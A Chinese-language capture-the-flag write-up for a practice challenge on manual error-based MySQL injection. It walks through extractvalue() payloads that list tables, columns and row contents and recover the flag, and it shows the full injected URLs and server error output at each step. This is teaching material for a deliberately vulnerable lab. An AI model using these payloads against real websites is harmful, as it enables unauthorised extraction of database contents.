题目:
本题目为手工注入学习题目,主要用于练习基于Mysql报错的手工注入。Sqlmap一定能跑出来,所以不必测试了。flag中不带key和#
writeup:
题目上都说了是基于mysql报错的手工注入。
- 进入题目后返回如下界面;
username:admin status:ok
直接加单引号返回:Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20 Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'' limit 1' at line 1 username:admin' status:ok
可以直接看到这一句''admin'' limit 1'
可以推出后台的大概sql语句为(table是代指):"select * from table where username=\'$_GET['username']\' limit 1"- 基于报错的注入有很多方式(可以看看这个博客整理的http://www.2cto.com/database/201410/344310.html),这里写一种利用extractvalue函数进行的注入:
?username=admin' and extractvalue(rand(),concat(0x3a,(SQL注入语句)))%23 - 爆出表名:
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20 Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24 XPATH syntax error: ':log,motto,user' username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))# status:ok
发现有log,user,motto三个表。 - 爆出列名(以motto为例)
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))%23Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20 Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24 XPATH syntax error: ':id,username,motto' username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))# status:ok
发现列名id,username,motto。 - 查询各列值
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(motto) from motto)))%23Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20 Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24 XPATH syntax error: ':mymotto,happy everyday,nothing ' username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(motto) from motto)))# status:ok?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))%23Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20 Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24 XPATH syntax error: ':admin,guest,test,#adf#ad@@#' username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))# status:ok
可以发现两次注入返回的结果username字段比motto字段多一个结果,这说明flag可能就在被隐藏的结果中(这点应该有办法事先知道,我是对比出来的,初学注入技术还不到位)。 - 再次构造如下语句,利用limit查询:
?username=admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))%23Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20 Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24 XPATH syntax error: ':key#notfound!#:' username:admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))# status:ok
再根据题目提示,去掉key和号得到flag!!